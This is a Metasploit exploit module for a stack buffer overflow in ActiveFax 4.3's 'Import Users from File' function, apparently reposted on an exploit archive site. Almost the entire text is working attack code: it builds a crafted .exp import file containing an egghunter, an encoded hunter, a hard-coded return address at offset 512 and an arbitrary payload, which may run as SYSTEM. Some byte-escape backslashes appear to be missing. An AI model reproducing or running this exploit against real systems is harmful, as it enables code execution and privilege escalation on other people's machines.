Home / exploitsPDF  

ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow

Posted on 07 September 2012

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT
 include Msf::Exploit::Remote::Egghunter

 def initialize(info = {})
 super(update_info(info,
 'Name' => 'ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow',
 'Description' => %q{
 This module exploits a vulnerability in ActiveFax Server. The vulnerability is
 a stack based buffer overflow in the "Import Users from File" function, due to the
 insecure usage of strcpy while parsing the csv formatted file. The module creates a
 .exp file that must be imported with ActiveFax Server. The module has been tested
 successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the
 Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
 'Craig Freyman', # Vulnerability discovery and PoC
 'Brandon Perry', # Metasploit module
 'juan vazquez' # Metasploit module
 ],
 'References' =>
 [
 [ 'EDB', '20915' ],
 [ 'URL', 'http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html' ]
 ],
 'DefaultOptions' =>
 {
 'ExitFunction' => 'process',
 },
 'Platform' => 'win',
 'Payload' =>
 {
 'Space' => 4000,
 'BadChars' => "",
 'DisableNops' => true,
 },

 'Targets' =>
 [
 [ 'ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1',
 {
 'Ret' => 0x00401b22, # ret from ActFax.exe]
 'Offset' => 512
 }
 ]
 ],
 'Privileged' => true,
 'DisclosureDate' => 'Aug 28 2012',
 'DefaultTarget' => 0))

 register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.exp']),], self.class)

 end

 def exploit

 #These badchars do not apply to the final payload
 badchars = (0x00..0x20).to_a.pack("C*") + "x7c"

 eggoptions =
 {
 :checksum => true,
 :eggtag => 'w00t'
 }

 hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

 [ 'x86/alpha_upper'].each { |name|
 enc = framework.encoders.create(name)
 if name =~/alpha/
 enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
 end
 hunter = enc.encode(hunter, nil, nil, platform)
 }

 buffer = "x83xC4x7f" * 19 # add esp, byte 0xff
 buffer << "x83xC4x23" # add esp, byte 0x23
 buffer << hunter
 buffer << rand_text(target['Offset'] - buffer.length, badchars)
 buffer << [target.ret].pack("V")
 buffer << egg

 file = "User Name	Entire User Name	Password	Alias-Names	Group	Direct Dialing	Cost Account	Permissions	Comments	User-Defined	"
 file << "Predefined Settings	Name 1	Name 2	Name 3	Name 4	Name 5	Department	Attention of	Phone 1	Phone 2	Fax Number	E-Mail	"
 file << "Coverpage Non-Windows	Overlay Non-Windows	Coverpage Windows	Overlay Windows	User-Defined	Printer Settings	Automatic Printing Outgoing	"
 file << "Printer Name Outgoing	Report Outgoing	Automatic Printing Incoming	Printer Name Incoming	Report Incoming	Notification Outgoing	"
 file << "Email Outgoing	Notification Incoming	Email Incoming	Attach Original Message	User-Defined Archive Settings	Export Outgoing	"
 file << "Export Incoming	Export-Path	Mark as Read
"
 file << buffer
 file << "
"

 file_create(file)

 end
end

 

TOP

Malware :

Exploits :